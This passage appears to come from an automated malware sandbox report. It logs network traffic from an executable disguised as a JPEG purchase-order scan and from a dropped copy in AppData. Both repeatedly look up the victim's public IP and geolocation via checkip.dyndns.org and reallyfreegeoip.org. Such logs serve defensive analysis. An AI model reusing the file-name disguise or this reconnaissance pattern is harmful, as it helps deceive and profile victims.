                                                                                                      7192.168.2.449753193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:12.005686998 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:13.136481047 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:13 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 53b6f0b99f76ec497d5b9dda555439d5
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.449754193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:12.511708975 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:13.886181116 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:13 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 19e5ffcd4f4d9c53f93176b175414612
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.449757193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:14.043553114 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:15.272080898 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: f01e864e400ca64230f96c39dad93e23
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.449758193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:14.668287039 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:15.923504114 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 5d45201cb8469aba17a2e2fbb113b526
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.449762193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:16.052448034 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:16.714617014 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: abb033c40778d6d7ece2c328e6e533af
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.449765193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:16.726078033 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:17.449722052 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 4b6e335968c531c049a61631886a66f7
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.449769193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:17.481931925 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:18.420723915 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: eed0fa300fcbe57f4b990cab13ad51f4
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.449773193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:19.189542055 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:20.888344049 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: c9a8748790eaa82f68bd2f81f127d51c
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.449776193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:21.701718092 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:22.365217924 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 94bc4edb684db190d7bd60977225c905
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449736188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:05 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:05 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:05 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 361
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkou9CPsSDqOzSwNo0QBSnLV0rCmAAeQQ%2BC7YRLce53SImoVS%2BL0l1NgMsJyyszTgcUPeUE2B8yd4uBq7K13igCv36AuzJNUcvYNf2nB%2Btp4AbF%2FbwqGl0wV13odVLchFEkSeYd9"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e3c4c9346c8-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1133&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2490111&cwnd=251&unsent_bytes=0&cid=d7f0d202dd561c92&ts=278&x=0"
                                                                                                      2024-10-25 07:18:05 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449738188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:06 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:06 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:06 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 362
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PUjg61Pr8aN9bZMghMGzqhRT7HliVNvHL3SCPaCXHs%2Bgsz5L9q4d02u7hN%2BCJIPKw43hGZpVHJVSG7Qv4bqInlMmlXB%2FSgWWCUZu6oyXjz1aYJusNkZ1mybdi%2FzsSzRmMbuG02o"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e423a486c26-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1026&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2688950&cwnd=250&unsent_bytes=0&cid=f4fae749c5754526&ts=150&x=0"
                                                                                                      2024-10-25 07:18:06 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449741188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:07 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:07 UTC894INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:07 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 363
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Weq%2FzXkPfawjjt7rwuggoHkSNDs5PgUg30iKqCRA7TDKzFd%2BoaILfIx55d2zEpk9NPIDD4mcPHn%2B5t1PN52yXPESpCkkXs292kDcU7t%2BSgyvwVWxr3IJDEJNG9IkBqdB6QcSCMm"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e4b6ae3e909-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2153159&cwnd=247&unsent_bytes=0&cid=f384f482924f8fb3&ts=149&x=0"
                                                                                                      2024-10-25 07:18:07 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449745188.114.97.34431260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:09 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-25 07:18:09 UTC888INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:09 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 365
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqNRhXLPpeX3RkeriO1aV%2BowLjpKAnDwSJdX85s2PlNVG6mJHj31RyCijYau8ASBJWChjP7nwUmo77n4Fop4CdDncHvg6PoN6c4NhsK2ENREroSZG4eMuqHQet40OL3I8vbUyyhk"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e545b9b6c4f-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2175807&cwnd=244&unsent_bytes=0&cid=d64038ccf8ab1812&ts=149&x=0"
                                                                                                      2024-10-25 07:18:09 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-25 07:18:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449744188.114.97.34437448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-25 07:18:09 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-25 07:18:09 UTC896INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:09 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 365
                                                                                                      Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TP4zXZeBAKtNBVHRBNPIi%2B7Br7x1CDiy8yfzpKYuFc8IcYbMY4vUYQytFEuJPKVjnfafK6A15jijkgnE3xRERcxMpxJuX%2BXXYuu62X4UDYjloD%2BLQMmwiYSgiq%2FvUPuL%2BHvjmpTR"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d806e556861eaac-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
